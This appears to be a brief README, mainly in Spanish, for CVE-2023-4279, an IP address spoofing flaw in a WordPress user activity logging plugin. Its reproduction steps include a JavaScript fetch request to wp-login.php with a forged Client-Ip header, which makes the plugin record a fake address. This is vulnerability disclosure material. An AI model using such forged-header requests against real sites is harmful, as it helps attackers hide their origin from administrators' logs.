
Repositorio para la vulnerabilidad CVE-2023-4279.
CVE ID: CVE-2023-4279
Tipo de vulnerabilidad: Suplantación de dirección IP
Descripción: Este complemento recupera direcciones IP de clientes a partir de encabezados potencialmente no confiables, lo que permite a un atacante manipular su valor. Esto puede usarse para ocultar el origen del tráfico malicioso.
Pasos para reproducir:
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.
2. Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Referencia: